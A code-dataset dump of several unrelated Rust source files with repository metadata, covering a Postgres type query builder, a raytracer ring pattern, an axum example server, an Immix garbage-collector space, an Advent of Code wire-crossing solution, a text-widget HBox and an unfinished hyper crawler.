use super::*; use crate::extension::postgres::types::*; impl TypeBuilder for PostgresQueryBuilder { fn prepare_type_create_statement(&self, create: &TypeCreateStatement, sql: &mut SqlWriter, collector: &mut dyn FnMut(Value)) { write!(sql, "CREATE TYPE ").unwrap(); if let Some(name) = &create.name { name.prepare(sql, '"'); } if let Some(as_type) = &create.as_type { write!(sql, " AS ").unwrap(); self.prepare_create_as_type(&as_type, sql); } if !create.values.is_empty() { write!(sql, " (").unwrap(); for (count, val) in create.values.iter().enumerate() { if count > 0 { write!(sql, ", ").unwrap(); } self.prepare_value(&val.to_string().into(), sql, collector); } write!(sql, ")").unwrap(); } } fn prepare_type_drop_statement(&self, drop: &TypeDropStatement, sql: &mut SqlWriter, _collector: &mut dyn FnMut(Value)) { write!(sql, "DROP TYPE ").unwrap(); if drop.if_exists { write!(sql, "IF EXISTS ").unwrap(); } for name in drop.names.iter() { name.prepare(sql, '"'); } if let Some(option) = &drop.option { write!(sql, " ").unwrap(); self.prepare_drop_type_opt(&option, sql); } } } impl PostgresQueryBuilder { fn prepare_create_as_type(&self, as_type: &TypeAs, sql: &mut SqlWriter) { write!(sql, "{}", match as_type { TypeAs::Enum => "ENUM", }).unwrap() } fn prepare_drop_type_opt(&self, opt: &TypeDropOpt, sql: &mut SqlWriter) { write!(sql, "{}", match opt { TypeDropOpt::Cascade => "CASCADE", TypeDropOpt::Restrict => "RESTRICT", }).unwrap() } }
true
00de287bd08343e89a8c9c4e068f7474b0e998db
Rust
po-gl/Raytracer
/src/pattern/ring_pattern.rs
UTF-8
2,067
3.71875
4
[ "MIT" ]
permissive
/// # Ring Patterns /// `ring_pattern` is a module to represent ring patterns (bull's eye) use crate::color::Color; use crate::tuple::Tuple; use crate::matrix::Matrix4; use crate::pattern::Pattern; use std::fmt::{Formatter, Error}; use std::any::Any; use crate::float::Float; #[derive(Debug, PartialEq, Copy, Clone)] pub struct RingPattern { pub a: Color, // First color used in the pattern pub b: Color, // Second color used in the pattern pub transform: Matrix4, } impl RingPattern { pub fn new(color_a: Color, color_b: Color) -> RingPattern { RingPattern { a: color_a, b: color_b, transform: Matrix4::identity() } } } impl Pattern for RingPattern { fn as_any(&self) -> &dyn Any { self } fn box_eq(&self, other: &dyn Any) -> bool { other.downcast_ref::<Self>().map_or(false, |a| self == a) } fn debug_fmt(&self, f: &mut Formatter<'_>) -> Result<(), Error> { write!(f, "Box {:?}", self) } fn pattern_clone(&self) -> Box<dyn Pattern + Send> { Box::new(*self) } fn transform(&self) -> Matrix4 { self.transform } fn set_transform(&mut self, transform: Matrix4) { self.transform = transform; } fn pattern_at(&self, point: &Tuple) -> Color { // floor of the magnitude (x, z) mod 2 == 0 if Float((point.x * point.x + point.z * point.z).value().sqrt().floor() % 2.0) == Float(0.0) { self.a } else { self.b } } } #[cfg(test)] mod tests { use super::*; use crate::tuple::point; #[test] fn ring_pattern() { let pattern = RingPattern::new(Color::white(), Color::black()); assert_eq!(pattern.pattern_at(&point(0.0, 0.0, 0.0)), Color::white()); assert_eq!(pattern.pattern_at(&point(1.0, 0.0, 0.0)), Color::black()); assert_eq!(pattern.pattern_at(&point(0.0, 0.0, 1.0)), Color::black()); // 0.708 is slightly more than 2.0.sqrt()/2 assert_eq!(pattern.pattern_at(&point(0.708, 0.0, 0.708)), Color::black()); } }
true
e689ae3e6bd1514cbe7a350f6ead3e52f05c2e40
Rust
JohnTitor/crates.io
/conduit-axum/examples/server.rs
UTF-8
1,111
2.515625
3
[ "MIT", "Apache-2.0" ]
permissive
#![deny(clippy::all)] use axum::routing::get; use conduit_axum::{ server_error_response, spawn_blocking, ConduitRequest, HandlerResult, ServiceError, }; use axum::response::IntoResponse; use std::io; use std::thread::sleep; #[tokio::main] async fn main() { tracing_subscriber::fmt::init(); let router = axum::Router::new() .route("/", get(endpoint)) .route("/panic", get(panic)) .route("/error", get(error)); let addr = ([127, 0, 0, 1], 12345).into(); axum::Server::bind(&addr) .serve(router.into_make_service()) .await .unwrap() } async fn endpoint(_: ConduitRequest) -> HandlerResult { spawn_blocking(move || sleep(std::time::Duration::from_secs(2))) .await .map_err(ServiceError::from) .map(|_| "Hello world!") .into_response() } async fn panic(_: ConduitRequest) -> HandlerResult { // For now, connection is immediately closed panic!("message"); } async fn error(_: ConduitRequest) -> HandlerResult { server_error_response(&io::Error::new(io::ErrorKind::Other, "io error, oops")) }
true
7cb53a3fba9bccf0b1872161bf7c261e1d587db9
Rust
microvm/immix-rust
/src/heap/immix/immix_space.rs
UTF-8
12,853
2.671875
3
[]
no_license
use heap::immix; use heap::gc; use common::Address; use common::AddressMap; extern crate std; extern crate memmap; extern crate libc; use std::*; use std::collections::LinkedList; use std::sync::Mutex; use std::sync::Arc; // this table will be accessed through unsafe raw pointers. since Rust doesn't provide a data structure for such guarantees: // 1. Non-overlapping segments of this table may be accessed parallelly from different mutator threads // 2. One element may be written into at the same time by different gc threads during tracing #[derive(Clone)] pub struct LineMarkTable { space_start : Address, ptr : *mut immix::LineMark, len : usize, } #[derive(Clone)] pub struct LineMarkTableSlice { ptr : *mut immix::LineMark, len : usize } impl LineMarkTable { pub fn new(space_start: Address, space_end: Address) -> LineMarkTable { let line_mark_table_len = space_end.diff(space_start) / immix::BYTES_IN_LINE; let line_mark_table = { let ret = unsafe {libc::malloc((mem::size_of::<immix::LineMark>() * line_mark_table_len) as libc::size_t)} as *mut immix::LineMark; let mut cursor = ret; for _ in 0..line_mark_table_len { unsafe {*cursor = immix::LineMark::Free;} cursor = unsafe {cursor.offset(1)}; } ret }; LineMarkTable{space_start: space_start, ptr: line_mark_table, len: line_mark_table_len} } pub fn take_slice(&mut self, start: usize, len: usize) -> LineMarkTableSlice { LineMarkTableSlice{ptr: unsafe {self.ptr.offset(start as isize)}, len: len} } #[inline(always)] fn get(&self, index: usize) -> immix::LineMark { debug_assert!(index <= self.len); unsafe {*self.ptr.offset(index as isize)} } #[inline(always)] fn set(&self, index: usize, value: immix::LineMark) { debug_assert!(index <= self.len); unsafe {*self.ptr.offset(index as isize) = value}; } #[inline(always)] pub fn mark_line_live(&self, addr: Address) { let line_table_index = addr.diff(self.space_start) >> immix::LOG_BYTES_IN_LINE; self.set(line_table_index, immix::LineMark::Live); if line_table_index < self.len - 1 { self.set(line_table_index + 1, immix::LineMark::ConservLive); } } #[inline(always)] pub fn mark_line_live2(&self, space_start: Address, addr: Address) { let line_table_index = addr.diff(space_start) >> immix::LOG_BYTES_IN_LINE; self.set(line_table_index, immix::LineMark::Live); if line_table_index < self.len - 1 { self.set(line_table_index + 1, immix::LineMark::ConservLive); } } } impl LineMarkTableSlice { #[inline(always)] pub fn get(&self, index: usize) -> immix::LineMark { debug_assert!(index <= self.len); unsafe {*self.ptr.offset(index as isize)} } #[inline(always)] pub fn set(&mut self, index: usize, value: immix::LineMark) { debug_assert!(index <= self.len); unsafe {*self.ptr.offset(index as isize) = value}; } #[inline(always)] pub fn len(&self) -> usize { self.len } } #[repr(C)] pub struct ImmixSpace { start : Address, end : Address, // these maps are writable at allocation, read-only at collection pub alloc_map : Arc<AddressMap<u8>>, // these maps are only for collection pub trace_map : Arc<AddressMap<u8>>, // this table will be accessed through unsafe raw pointers. since Rust doesn't provide a data structure for such guarantees: // 1. Non-overlapping segments of this table may be accessed parallelly from different mutator threads // 2. One element may be written into at the same time by different gc threads during tracing pub line_mark_table : LineMarkTable, total_blocks : usize, // for debug use #[allow(dead_code)] mmap : memmap::Mmap, usable_blocks : Mutex<LinkedList<Box<ImmixBlock>>>, used_blocks : Mutex<LinkedList<Box<ImmixBlock>>>, } pub struct ImmixBlock { id : usize, state : immix::BlockMark, start : Address, // a segment of the big line mark table in ImmixSpace line_mark_table : LineMarkTableSlice } const SPACE_ALIGN : usize = 1 << 19; impl ImmixSpace { pub fn new(space_size : usize) -> ImmixSpace { // acquire memory through mmap let anon_mmap : memmap::Mmap = match memmap::Mmap::anonymous(space_size + SPACE_ALIGN, memmap::Protection::ReadWrite) { Ok(m) => m, Err(_) => panic!("failed to call mmap"), }; let start : Address = Address::from_ptr::<u8>(anon_mmap.ptr()).align_up(SPACE_ALIGN); let end : Address = start.plus(space_size); let line_mark_table = LineMarkTable::new(start, end); let mut ret = ImmixSpace { start: start, end: end, mmap: anon_mmap, line_mark_table: line_mark_table, trace_map: Arc::new(AddressMap::new(start, end)), alloc_map: Arc::new(AddressMap::new(start, end)), usable_blocks: Mutex::new(LinkedList::new()), used_blocks: Mutex::new(LinkedList::new()), total_blocks: 0 }; ret.init_blocks(); ret } fn init_blocks(&mut self) -> () { let mut id = 0; let mut block_start = self.start; let mut line = 0; let mut usable_blocks_lock = self.usable_blocks.lock().unwrap(); while block_start.plus(immix::BYTES_IN_BLOCK) <= self.end { usable_blocks_lock.push_back(Box::new(ImmixBlock { id : id, state: immix::BlockMark::Usable, start: block_start, line_mark_table: self.line_mark_table.take_slice(line, immix::LINES_IN_BLOCK) })); id += 1; block_start = block_start.plus(immix::BYTES_IN_BLOCK); line += immix::LINES_IN_BLOCK; } self.total_blocks = id; } pub fn return_used_block(&self, old : Box<ImmixBlock>) { // Unsafe and raw pointers are used to transfer ImmixBlock to/from each Mutator. // This avoids explicit ownership transferring // If we explicitly transfer ownership, the function needs to own the Mutator in order to move the ImmixBlock out of it (see ImmixMutatorLocal.alloc_from_global()), // and this will result in passing the Mutator object as value (instead of a borrowed reference) all the way in the allocation self.used_blocks.lock().unwrap().push_front(old); } #[allow(unreachable_code)] pub fn get_next_usable_block(&self) -> Option<Box<ImmixBlock>> { let res_new_block : Option<Box<ImmixBlock>> = { self.usable_blocks.lock().unwrap().pop_front() }; if res_new_block.is_none() { // should unlock, and call GC here gc::trigger_gc(); None } else { res_new_block } } #[allow(unused_variables)] pub fn sweep(&self) { let mut free_lines = 0; let mut usable_blocks = 0; let mut full_blocks = 0; let mut used_blocks_lock = self.used_blocks.lock().unwrap(); let mut usable_blocks_lock = self.usable_blocks.lock().unwrap(); let mut live_blocks : LinkedList<Box<ImmixBlock>> = LinkedList::new(); while !used_blocks_lock.is_empty() { let mut block = used_blocks_lock.pop_front().unwrap(); let mut has_free_lines = false; { let mut cur_line_mark_table = block.line_mark_table_mut(); for i in 0..cur_line_mark_table.len() { if cur_line_mark_table.get(i) != immix::LineMark::Live && cur_line_mark_table.get(i) != immix::LineMark::ConservLive { has_free_lines = true; cur_line_mark_table.set(i, immix::LineMark::Free); free_lines += 1; } } // release the mutable borrow of 'block' } if has_free_lines { block.set_state(immix::BlockMark::Usable); usable_blocks += 1; usable_blocks_lock.push_front(block); } else { block.set_state(immix::BlockMark::Full); full_blocks += 1; live_blocks.push_front(block); } } used_blocks_lock.append(&mut live_blocks); if cfg!(debug_assertions) { println!("free lines = {} of {} total", free_lines, self.total_blocks * immix::LINES_IN_BLOCK); println!("usable blocks = {}", usable_blocks); println!("full blocks = {}", full_blocks); } if full_blocks == self.total_blocks { println!("Out of memory in Immix Space"); std::process::exit(1); } debug_assert!(full_blocks + usable_blocks == self.total_blocks); } pub fn start(&self) -> Address { self.start } pub fn end(&self) -> Address { self.end } pub fn line_mark_table(&self) -> &LineMarkTable { &self.line_mark_table } #[inline(always)] pub fn addr_in_space(&self, addr: Address) -> bool { addr >= self.start && addr < self.end } } impl ImmixBlock { pub fn get_next_available_line(&self, cur_line : usize) -> Option<usize> { let mut i = cur_line; while i < self.line_mark_table.len { match self.line_mark_table.get(i) { immix::LineMark::Free => {return Some(i);}, _ => {i += 1;}, } } None } pub fn get_next_unavailable_line(&self, cur_line : usize) -> usize { let mut i = cur_line; while i < self.line_mark_table.len { match self.line_mark_table.get(i) { immix::LineMark::Free => {i += 1;} _ => {return i; }, } } i } pub fn id(&self) -> usize { self.id } pub fn start(&self) -> Address { self.start } pub fn set_state(&mut self, mark: immix::BlockMark) { self.state = mark; } #[inline(always)] pub fn line_mark_table(&self) -> &LineMarkTableSlice { &self.line_mark_table } #[inline(always)] pub fn line_mark_table_mut(&mut self) -> &mut LineMarkTableSlice { &mut self.line_mark_table } } /// Using raw pointers forbid the struct being shared between threads /// we ensure the raw pointers won't be an issue, so we allow Sync/Send on ImmixBlock unsafe impl Sync for ImmixBlock {} unsafe impl Send for ImmixBlock {} unsafe impl Sync for ImmixSpace {} unsafe impl Send for ImmixSpace {} impl fmt::Display for ImmixSpace { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "ImmixSpace\n").unwrap(); write!(f, "range={:#X} ~ {:#X}\n", self.start, self.end).unwrap(); // print table by vec // write!(f, "table={{\n").unwrap(); // for i in 0..self.line_mark_table_len { // write!(f, "({})", i).unwrap(); // write!(f, "{:?},", unsafe{*self.line_mark_table.offset(i as isize)}).unwrap(); // if i % immix::BYTES_IN_LINE == immix::BYTES_IN_LINE - 1 { // write!(f, "\n").unwrap(); // } // } // write!(f, "\n}}\n").unwrap(); write!(f, "t_ptr={:?}\n", self.line_mark_table.ptr).unwrap(); // write!(f, "usable blocks:\n").unwrap(); // for b in self.usable_blocks.iter() { // write!(f, " {}\n", b).unwrap(); // } // write!(f, "used blocks:\n").unwrap(); // for b in self.used_blocks.iter() { // write!(f, " {}\n", b).unwrap(); // } write!(f, "done\n") } } impl fmt::Display for ImmixBlock { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "ImmixBlock#{}(state={:?}, address={:#X}, line_table={:?}", self.id, self.state, self.start, self.line_mark_table.ptr).unwrap(); write!(f, "[").unwrap(); for i in 0..immix::LINES_IN_BLOCK { write!(f, "{:?},", self.line_mark_table.get(i)).unwrap(); } write!(f, "]") } }
true
82e1bcd0988973908b9a4832290b59f0d72f4e90
Rust
Syphonx/aoc-2019
/src/day3.rs
UTF-8
6,554
3.234375
3
[]
no_license
/* --- Day 3: Crossed Wires --- */ use failure::Error; #[derive(Debug, PartialEq, Copy, Clone)] pub enum WireDirection { Invalid, Up, Right, Down, Left, } #[derive(Debug, PartialEq, Copy, Clone)] pub struct Point { x: i32, y: i32, } impl Point { const INVALID_POINT: Point = Point { x: 0, y: 0 }; pub fn new(x: i32, y: i32) -> Self { Point { x, y } } fn manhattan_distance(&self, other: &Point) -> usize { ((self.x - other.x).abs() + (self.y - other.y).abs()) as usize } } #[derive(Debug, PartialEq, Copy, Clone)] pub struct Line { from: Point, to: Point, } impl Line { fn length(&self) -> usize { self.from.manhattan_distance(&self.to) } fn length_to_point(&self, point: &Point) -> usize { self.from.manhattan_distance(point) } fn x_min(&self) -> i32 { std::cmp::min(self.from.x, self.to.x) } fn x_max(&self) -> i32 { std::cmp::max(self.from.x, self.to.x) } fn y_min(&self) -> i32 { std::cmp::min(self.from.y, self.to.y) } fn y_max(&self) -> i32 { std::cmp::max(self.from.y, self.to.y) } fn intersection(&self, other: &Line) -> Option<Point> { let f = |l1: &Line, l2: &Line| { if (l1.x_min() >= l2.x_min() && l1.x_min() <= l2.x_max()) && (l2.y_min() >= l1.y_min() && l2.y_min() <= l1.y_max()) { return Some(Point::new(l1.x_min(), l2.y_min())); } else { return None; } }; let (f1, f2) = (f(self, other), f(other, self)); let res = f1.or(f2); if let Some(p) = res { if p != Point::new(0, 0) { return res; } else { return None; } } else { return res; } } } #[derive(Debug, Copy, Clone, PartialEq)] pub struct CrossingPoint { point: Point, steps: usize, } impl CrossingPoint { fn new(point: &Point, steps: usize) -> Self { CrossingPoint { point: *point, steps, } } } pub struct Wire { direction: WireDirection, length: i32, index: i32, line: Line, } pub fn char_to_direction(input: &char) -> WireDirection { match input { 'U' => WireDirection::Up, 'D' => WireDirection::Down, 'L' => WireDirection::Left, 'R' => WireDirection::Right, _ => WireDirection::Invalid, } } pub fn enum_to_str(input: &WireDirection) -> &'static str { match input { WireDirection::Up => "Up", WireDirection::Down => "Down", WireDirection::Left => "Left", WireDirection::Right => "Right", WireDirection::Invalid => "Invalid", } } pub fn direction_to_move(direction: &WireDirection, length: i32) -> (i32, i32) { match direction { WireDirection::Up => (0, length), WireDirection::Down => (0, -length), WireDirection::Left => (-length, 0), WireDirection::Right => (length, 0), WireDirection::Invalid => (0, 0), } } #[aoc_generator(day3)] pub fn input_generator(input: &str) -> Vec<Wire> { let mut wires: Vec<Wire> = Vec::new(); let mut marker: (i32, i32) = (0, 0); for (index, line) in input.lines().enumerate() { for wire in line.trim().split(',') { let (dir, len) = wire.trim().split_at(1); let direction: WireDirection = char_to_direction(&dir.chars().next().unwrap()); let length: i32 = len.parse::<i32>().expect("Expected integer"); let new_wire = Wire { direction, length, index: index as i32, line: Line { from: Point::new(marker.0, marker.1), to: Point::new( marker.0 + direction_to_move(&direction, length).0, marker.1 + direction_to_move(&direction, length).1, ), }, }; marker.0 = new_wire.line.to.x; marker.1 = new_wire.line.to.y; wires.push(new_wire); } marker = (0, 0); } return wires; } pub fn print_path(path: &Wire) { println!( "Wire: {} - ({}, {}) -> ({}, {}) = {} - [{}]", enum_to_str(&path.direction), path.line.from.x, path.line.from.y, path.line.to.x, path.line.to.y, path.length, path.index ); } pub fn print_intersection(intersection: &Point, path: &Line, other: &Line) { println!( "Intersection {:?} between {:?} and {:?}", intersection, path, other ); } pub fn collect_intersections<'a, 'b>( wire_0: &'a Vec<&Wire>, wire_1: &'b Vec<&Wire>, ) -> Result<Vec<CrossingPoint>, Error> { // Keep track of the intersections let intersections = wire_0 .iter() .enumerate() .flat_map(|(i, wire)| { wire_1 .iter() .enumerate() .filter_map(move |(j, other_wire)| { let intersection = wire.line.intersection(&other_wire.line); match intersection { Some(x) => { // Don't match intersections at (0, 0) if x != Point::INVALID_POINT { wire.line.intersection(&other_wire.line).map(|a| { CrossingPoint::new( &a, wire_0 .iter() .take(i) .map(|a| a.line.length()) .sum::<usize>() + wire.line.length_to_point(&a) + wire_1 .iter() .take(j) .map(|a| a.line.length()) .sum::<usize>() + other_wire.line.length_to_point(&a), ) }) } else { None } } None => None, } }) }) .collect::<Vec<CrossingPoint>>(); if intersections.is_empty() { return Err(failure::format_err!("No crossed wires found.")); } else { return Ok(intersections); } } #[aoc(day3, part1)] pub fn solve_part1(input: &[Wire]) -> i32 { // Define our origin point let origin = Point::new(0, 0); // Split the input into wire 1 and wire 2 let wire_1: Vec<&Wire> = input.into_iter().filter(|x| x.index == 0).collect(); let wire_2: Vec<&Wire> = input.into_iter().filter(|x| x.index == 1).collect(); // Collect intersections let intersections: Vec<CrossingPoint> = collect_intersections(&wire_1, &wire_2).unwrap(); // Parse the intersections and find the closest let min_distance = intersections .iter() .map(|i| (origin.manhattan_distance(&i.point), i)) .min_by_key(|t| t.0) .expect("Could not find a minimum manhattan distance."); // Finally, return our value return min_distance.0 as i32; } #[aoc(day3, part2)] pub fn solve_part2(input: &[Wire]) -> i32 { // Split the input into wire 1 and wire 2 let wire_1: Vec<&Wire> = input.into_iter().filter(|x| x.index == 0).collect(); let wire_2: Vec<&Wire> = input.into_iter().filter(|x| x.index == 1).collect(); // Collect intersections let intersections: Vec<CrossingPoint> = collect_intersections(&wire_1, &wire_2).unwrap(); // Parse the intersections and find the closest let min_distance = intersections .iter() .map(|i| (i.steps, i.point)) .min_by_key(|t| t.0) .expect("Could not find a minimum number of steps."); // Finally, return our value return min_distance.0 as i32; }
true
42633cc44a662285ee4a36a50b43686629df1052
Rust
guilhemSmith/mod1
/src/algo/heightmap.rs
UTF-8
4,244
2.84375
3
[]
no_license
use super::{Map, DIM}; use crate::engine::{Entity, EntityStore, Mesh}; use glam::{Vec2, Vec3}; use std::any::Any; use std::fs::File; use std::io::{BufRead, BufReader}; const WEIGHT_DIST: f32 = 5.0; const MAP_SIZE: usize = DIM * DIM; const MAP_SCALE: f32 = 1.0; #[derive(Debug)] pub struct HeightMap { points: Map<MAP_SIZE>, } impl HeightMap { pub fn new(filename: &str) -> Result<Self, String> { let mut poi: Vec<Vec3> = Vec::new(); let file = File::open(filename).map_err(|err| format!("Failed to read file: {}", err))?; let reader = BufReader::new(file); for (index_l, line) in reader.lines().enumerate() { let line = line.map_err(|err| format!("Failed to read file: {}", err))?; let mut point: [f32; 3] = [0.0; 3]; let mut count = 0; for (index_v, value) in line.split_ascii_whitespace().enumerate() { count += 1; if count > 3 { return Err(format!("[line: {}] Too many values", index_l + 1)); } point[index_v] = value .parse() .map_err(|err| { format!( "[line: {}, pos: {}] Invalid value '{}' ({})", index_l + 1, index_v + 1, value, err ) }) .and_then(|number| { if index_v < 2 { match number { n if n < 100.0 && n > 0.0 => Ok(n), n => Err(format!( "[line: {}, pos: {}] Invalid coordinate number '{}' (not between 0 and 99)", index_l + 1, index_v + 1, n )), } } else { match number { n if n < 50.0 && n > -50.0 => Ok(n), n => Err(format!( "[line: {}, pos: {}] Invalid height number '{}' (not between -50 and 50)", index_l + 1, index_v + 1, n )), } } })?; } if count < 3 { return Err(format!("[line: {}] Not enough values", index_l + 1)); } poi.push(Vec3::from(point)); } let scaled = poi.into_iter().map(|pt| pt * MAP_SCALE).collect(); let map = HeightMap::poi_to_map(scaled); Ok(HeightMap { points: map }) } pub fn height_points(&self) -> &Map<MAP_SIZE> { &self.points } pub fn border_wall(&self) -> Vec<Vec3> { let dim = (DIM - 1) as f32; vec![ Vec3::new(0.0, 0.0, -50.0), Vec3::new(0.0, 0.0, 0.0), Vec3::new(dim, 0.0, -50.0), Vec3::new(dim, 0.0, 0.0), Vec3::new(dim, dim, -50.0), Vec3::new(dim, dim, 0.0), Vec3::new(0.0, dim, -50.0), Vec3::new(0.0, dim, 0.0), Vec3::new(0.0, 0.0, -50.0), Vec3::new(0.0, 0.0, 0.0), ] } fn add_border_zero(poi: &mut Vec<Vec3>) { let max_val = (DIM - 1) as f32; poi.push(Vec3::new(0.0, 0.0, 0.0)); poi.push(Vec3::new(0.0, max_val, 0.0)); poi.push(Vec3::new(max_val, 0.0, 0.0)); poi.push(Vec3::new(max_val, max_val, 0.0)); for i in 1..(DIM - 1) { let variant = i as f32; poi.push(Vec3::new(variant, 0.0, 0.0)); poi.push(Vec3::new(0.0, variant, 0.0)); poi.push(Vec3::new(variant, max_val, 0.0)); poi.push(Vec3::new(max_val, variant, 0.0)); } } fn idw(coord: Vec2, poi: &Vec<Vec3>) -> f32 { let mut top = 0.0; let mut bot = 0.0; for i in poi.iter() { let k_coord = Vec2::new(i.x, i.y); let k_value = i.z; let inv_dist = (1.0 / (coord - k_coord).length()).powf(WEIGHT_DIST); top += inv_dist * k_value; bot += inv_dist; } return top / bot; } fn poi_to_map(mut poi: Vec<Vec3>) -> [f32; MAP_SIZE] { HeightMap::add_border_zero(&mut poi); let mut map = [0.0; MAP_SIZE]; for i in 0..DIM { let x = i as f32; for j in 0..DIM { let y = j as f32; if let Some(point) = poi.iter().find(|pt| pt.x == x && pt.y == y) { map[i + j * DIM] = point.z } else { map[i + j * DIM] = HeightMap::idw(Vec2::new(x, y), &poi); } } } return map; } } impl Entity for HeightMap { fn as_any(&self) -> &dyn Any { self } fn as_any_mut(&mut self) -> &mut dyn Any { self } fn start(&mut self, store: &EntityStore) { let terrain_vert = Mesh::heights_gen_vertices(DIM, &Vec::from(self.points)); let terrain_mesh = Box::new(Mesh::new("terrain", &terrain_vert, DIM, true, true, None)); let border_vert = Mesh::wall_gen_vertices(&self.border_wall()); let border_mesh = Box::new(Mesh::new("border", &border_vert, DIM, true, true, None)); store.to_new_queue(terrain_mesh); store.to_new_queue(border_mesh); } }
true
f78e9c4b4d3a91192a8862ec79e20aeef209c17c
Rust
Jason-S-Ross/stylish-stringlike
/src/widget/hbox.rs
UTF-8
6,553
3.125
3
[]
no_license
use crate::text::{Pushable, Width}; use crate::widget::{Fitable, Truncateable}; use std::iter::FromIterator; /// A displayable box of text widgets. pub struct HBox<'a, T: Truncateable> { elements: Vec<Box<dyn Fitable<T> + 'a>>, } impl<'a, T: Truncateable> Default for HBox<'a, T> { fn default() -> Self { HBox { elements: vec![] } } } impl<'a, T: Truncateable> HBox<'a, T> { pub fn new() -> Self { HBox { elements: Vec::new(), } } /// Adds an element. pub fn push(&mut self, element: Box<dyn Fitable<T> + 'a>) { self.elements.push(element); } /// Truncates this widget to a given size. pub fn truncate(&self, width: usize) -> T where T: Pushable<T> + Pushable<T::Output> + Default, { let mut space = width; let mut todo: Vec<(usize, _)> = self .elements .iter() .enumerate() .filter_map(|(index, element)| { if let Width::Bounded(_w) = element.width() { Some((index, element)) } else { None } }) .collect(); let mut to_fit = todo.len(); let mut widths: std::collections::HashMap<usize, usize> = Default::default(); while to_fit > 0 { let target_width: f32 = space as f32 / to_fit as f32; let mut to_pop = vec![]; for (rel_index, (index, element)) in todo.iter().enumerate() { if let Width::Bounded(w) = element.width() { if (w as f32) <= target_width { space -= w; to_fit -= 1; widths.insert(*index, w); to_pop.push(rel_index) } } } for index in to_pop.iter().rev() { todo.remove(*index); } if to_pop.is_empty() { let target_width = space / todo.len(); let rem = space % todo.len(); for (i, (index, _widget)) in todo.iter().enumerate() { let w = if i < rem { target_width + 1 } else { target_width }; space -= w; widths.insert(*index, w); } break; } } let infinite_widths: Vec<(usize, _)> = self .elements .iter() .enumerate() .filter_map(|(index, element)| { if let Width::Unbounded = element.width() { Some((index, element)) } else { None } }) .collect(); if !infinite_widths.is_empty() { let target_width = space / infinite_widths.len(); let rem = space % infinite_widths.len(); for (rel_index, (abs_index, _element)) in infinite_widths.iter().enumerate() { let w = if rel_index < rem { target_width + 1 } else { target_width }; widths.insert(*abs_index, w); } } let mut res: T = Default::default(); let elements = self .elements .iter() .enumerate() .map(move |(i, widget)| widget.truncate(widths[&i])) .flatten(); for elem in elements { res.push(&elem) } res } } impl<'a, T: Truncateable> FromIterator<Box<dyn Fitable<T> + 'a>> for HBox<'a, T> { fn from_iter<I>(iter: I) -> HBox<'a, T> where I: IntoIterator<Item = Box<dyn Fitable<T> + 'a>>, { let mut result: HBox<T> = Default::default(); for item in iter { result.push(item) } result } } #[cfg(test)] mod test { use super::*; use crate::text::*; use crate::widget::{Repeat, TextWidget, TruncationStyle}; use std::borrow::Cow; #[test] fn make_hbox() { let fmt_1 = Tag::new("<1>", "</1>"); let fmt_2 = Tag::new("<2>", "</2>"); let fmt_3 = Tag::new("<3>", "</3>"); let mut spans: Spans<Tag> = Default::default(); spans.push(&Span::new(Cow::Borrowed(&fmt_2), Cow::Borrowed("01234"))); spans.push(&Span::new(Cow::Borrowed(&fmt_3), Cow::Borrowed("56789"))); let truncator = { let mut ellipsis = Spans::<Tag>::default(); ellipsis.push(&Span::new(Cow::Borrowed(&fmt_1), Cow::Borrowed("..."))); TruncationStyle::Left(ellipsis) }; let widget = TextWidget::new(Cow::Borrowed(&spans), Cow::Borrowed(&truncator)); let mut hbox: HBox<Spans<Tag>> = Default::default(); hbox.push(Box::new(widget)); let actual = format!("{}", hbox.truncate(9)); let expected = String::from("<2>01234</2><3>5</3><1>...</1>"); assert_eq!(expected, actual); } #[test] fn make_hbox_infinite() { let fmt_1 = Tag::new("<1>", "</1>"); let fmt_2 = Tag::new("<2>", "</2>"); let span = Span::new(Cow::Borrowed(&fmt_2), Cow::Borrowed("=")); let repeat = Repeat::new(span); let truncator = TruncationStyle::Left(Span::new(Cow::Borrowed(&fmt_1), Cow::Borrowed("..."))); let widget = TextWidget::new(Cow::Borrowed(&repeat), Cow::Borrowed(&truncator)); let mut hbox: HBox<Spans<Tag>> = Default::default(); hbox.push(Box::new(widget)); let actual = format!("{}", hbox.truncate(5)); let expected = String::from("<2>==</2><1>...</1>"); assert_eq!(expected, actual); } #[test] fn make_hbox_literal() { let fmt_2 = Tag::new("<2>", "</2>"); let fmt_3 = Tag::new("<3>", "</3>"); let mut spans: Spans<Tag> = Default::default(); spans.push(&Span::new(Cow::Borrowed(&fmt_2), Cow::Borrowed("01234"))); spans.push(&Span::new(Cow::Borrowed(&fmt_3), Cow::Borrowed("56789"))); let truncator = TruncationStyle::Left("..."); let widget = TextWidget::new(Cow::Borrowed(&spans), Cow::Borrowed(&truncator)); let mut hbox: HBox<Spans<Tag>> = Default::default(); hbox.push(Box::new(widget)); let actual = format!("{}", hbox.truncate(9)); let expected = String::from("<2>01234</2><3>5...</3>"); assert_eq!(expected, actual); } }
true
52f83f8b0f6aee4613fc0e4016c6a94ec7e36555
Rust
fredmorcos/attic
/Projects/Crawl (Rust)/crawl-hyper-2/src/main.rs
UTF-8
1,908
2.71875
3
[ "Unlicense" ]
permissive
#![warn(clippy::all)] use futures::future::{self, Future}; use futures::stream::Stream; use hyper::{ rt::{self, Future as HyperFuture}, service::service_fn, Body, Error as HyperError, Method, Request, Response, Server, StatusCode, }; use std::{ error::Error, fmt::{self, Display}, net::{AddrParseError, SocketAddr}, str, sync::{Arc, Mutex}, }; fn index( req: Request<Body>, name: Arc<Mutex<String>>, ) -> impl HyperFuture<Item = Response<Body>, Error = HyperError> + Send { let mut res = Response::new(Body::empty()); match (req.method(), req.uri().path()) { (&Method::POST, "/") => match name.lock() { Ok(name) => { *name = req .into_body() .map_err(Error::from) .concat2() .and_then(|c| str::from_utf8(&c).map(str::to_owned).map_err(Error::from)) } Err(e) => return future::err(String::new("Cannot access domain")), }, _ => *res.status_mut() = StatusCode::NOT_FOUND, } future::ok(res) } #[derive(Debug)] enum ScraperError { AddressParseError(AddrParseError), } impl Display for ScraperError { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { match self { ScraperError::AddressParseError(e) => write!(f, "Cannot parse network address: {}", e), } } } impl Error for ScraperError {} fn main() -> Result<(), ScraperError> { let addr = "127.0.0.1:3000" .parse::<SocketAddr>() .map_err(ScraperError::AddressParseError)?; let dom = Arc::new(Mutex::new(String::new())); let service = || service_fn(|req| index(req, dom.clone())); let server = Server::bind(&addr) .serve(service) .map_err(|e| eprintln!("Server error: {}", e)); println!("Listening on {}", addr); rt::run(server); Ok(()) }
true
